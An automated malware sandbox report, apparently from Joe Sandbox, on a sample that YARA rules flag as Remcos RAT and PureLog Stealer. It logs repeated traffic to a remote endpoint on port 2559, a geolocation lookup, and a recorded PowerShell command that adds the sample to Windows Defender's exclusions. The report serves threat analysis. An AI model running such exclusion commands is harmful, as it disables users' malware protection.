                                                                                                                                              Dec 5, 2024 18:27:00.924743891 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.924843073 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.924897909 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.924974918 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.924992085 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.925154924 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.925205946 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.925447941 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.925579071 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.925587893 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.925714970 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.956877947 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:00.958822012 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:00.974205971 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974217892 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974339008 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974347115 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974355936 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974366903 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974469900 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974483013 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974620104 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974628925 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974637985 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974647045 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974901915 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.974910021 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.975620031 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.975778103 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.975790977 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.975925922 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.975938082 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.976075888 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.976085901 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.976094007 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:00.976337910 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.008347988 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.009968042 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.030888081 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.031753063 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.032040119 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.032331944 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.032479048 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.032800913 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.032809973 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.032936096 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.034101963 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.042208910 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.046083927 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.064505100 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.066164970 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.077142000 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.077568054 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.077877045 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.077994108 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.078025103 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.078748941 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.078911066 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.079088926 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.079098940 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.126769066 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.128410101 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.128755093 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.129865885 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.129965067 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.130179882 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.130218983 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.130285025 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.165978909 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.169107914 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.176676989 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.178400040 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.184571028 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.184658051 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.184669971 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.184787989 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.184881926 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.184941053 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.184977055 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.186152935 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.186228037 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.186372042 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.186587095 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.224081039 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.225753069 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.238535881 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.241105080 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.246635914 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.246685982 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.246840954 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.246879101 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.247045040 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.247163057 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.247236967 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.248178959 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.248236895 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.248426914 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.248500109 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.248600960 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.288912058 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.289006948 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.296782970 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.296964884 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.297010899 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.297105074 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.298197031 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.298299074 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.298398018 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.298464060 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.298508883 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.316746950 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.318366051 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.344113111 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.344561100 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.344572067 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.344651937 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.346183062 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.346657991 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.361332893 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.362993956 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.408451080 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.410669088 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.436934948 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.437139034 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.437279940 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.437498093 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.438121080 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.438294888 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.438431025 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.438523054 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.438632965 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.455349922 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.456437111 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.456939936 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.457370996 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.460438013 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.483607054 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.483670950 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.486051083 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.486094952 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.488601923 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.488683939 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.488694906 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.491071939 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.491197109 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.493094921 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.493194103 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.493232012 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.531480074 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.531522036 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.534513950 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.535155058 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.537393093 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.537489891 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.540170908 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.540237904 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.540308952 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.543070078 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.543210030 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.576378107 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.576545000 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.577218056 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.577353954 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.578036070 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.578232050 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.578249931 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.578403950 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.578610897 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.578671932 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.580502033 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.581087112 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.583230019 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.583240032 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.652436018 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.652759075 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.699804068 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.845077991 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:01.964798927 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.967575073 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:01.974296093 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:02.037062883 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.085658073 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.085732937 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.086920023 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.086957932 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.088056087 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.088064909 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.088099003 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.089226961 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.089261055 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.090362072 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.090384960 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.094052076 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.159115076 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:02.171788931 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:02.173674107 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:02.237845898 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.248406887 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:02.250164986 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:02.279207945 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.279324055 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:02.291748047 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.291795015 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.291948080 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.291994095 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.292130947 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.292149067 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.292205095 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.293565035 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.293631077 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.293706894 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.293783903 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.293924093 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:27:02.299109936 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:27:02.301070929 CET497422559192.168.2.4192.3.64.152

                                                                                                                                              DNS Queries

                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                              Dec 5, 2024 18:25:41.483342886 CET192.168.2.41.1.1.10x8c22Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                                              DNS Answers

                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                              Dec 5, 2024 18:25:41.633713961 CET1.1.1.1192.168.2.40x8c22No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                                                              HTTP Packets

                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              0192.168.2.449736178.237.33.50808072C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Dec 5, 2024 18:25:41.833672047 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                              Host: geoplugin.net
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Dec 5, 2024 18:25:43.074841022 CET1171INHTTP/1.1 200 OK
                                                                                                                                              date: Thu, 05 Dec 2024 17:25:42 GMT
                                                                                                                                              server: Apache
                                                                                                                                              content-length: 963
                                                                                                                                              content-type: application/json; charset=utf-8
                                                                                                                                              cache-control: public, max-age=300
                                                                                                                                              access-control-allow-origin: *
                                                                                                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                                                                              Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                              Statistics

                                                                                                                                              CPU Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              Memory Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              High Level Behavior Distribution

                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                              Behavior

                                                                                                                                              Click to jump to process

                                                                                                                                              System Behavior

                                                                                                                                              General

                                                                                                                                              Target ID:0
                                                                                                                                              Start time:12:25:28
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Users\user\Desktop\LdSbZG1iH6.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\Desktop\LdSbZG1iH6.exe"
                                                                                                                                              Imagebase:0x850000
                                                                                                                                              File size:1'012'224 bytes
                                                                                                                                              MD5 hash:B2618FBB2E344DBDC7D4B33947D71531
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1995759921.0000000007820000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:2
                                                                                                                                              Start time:12:25:31
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe"
                                                                                                                                              Imagebase:0x110000
                                                                                                                                              File size:433'152 bytes
                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:3
                                                                                                                                              Start time:12:25:31
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                              File size:862'208 bytes
